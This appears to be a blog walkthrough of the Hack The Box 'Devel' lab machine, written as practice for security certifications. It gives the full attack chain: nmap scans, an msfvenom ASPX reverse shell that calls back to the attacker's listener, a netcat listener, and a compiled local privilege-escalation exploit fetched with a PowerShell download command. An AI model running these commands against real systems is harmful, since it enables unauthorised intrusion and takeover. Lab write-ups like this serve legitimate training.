Home Hack the Box — Devel
Post
Cancel

Hack the Box — Devel

Hack the Box — Devel

One of the first HTB boxes I solved a few months ago from the TJ Null List in preparation for the PNPT and OSCP.

Solving the “Devel” box can be divided into 3 main steps:

  1. Recon
  • We conduct some recon using nmap or rustscan
  • look into MS-IIS/7.5, google a bit about executable file types

2. Enumeration

  • using the anonymous FTP access

3. Exploitation

Recon

1
nmap -sC -sV -O -oA nmap/initial 10.10.10.5

1
nmap -sC -sV -O -p- -oA nmap/full 10.10.10.5

1
nmap -sU -O -oA nmap/udp 10.10.10.5

Enum

We have some web-facing material and we can try to go to these pages.

I think “evil” is left over from someone else working on the box 😅

Exploitation

Create reverse-shell.aspx with msfvenom

1
msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.37 LPORT=4444 -o reverse-shell.aspx

Push reverse-shell.aspx to the webserver

Start a listener with netcat in another terminal

nc -nlvp 4444

Visit http://10.10.10.5/reverse-shell.aspx to activate the payload

Gain shell on the listener

Priv Esc

Find an exploit that works

1
2
3
searchsploit -m 40564  
  
#this will download it to our currect directory

Compile it

1
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Serve it

Get it with powershell or certutil

1
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:443/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Once bad.exe is run the priv esc is immediate

Mitigation- How could this attack have been stopped?

  1. Disable anonymous access to the FTP server
  2. Configure the FTP server to only allow downloads
This post is licensed under CC BY 4.0 by the author.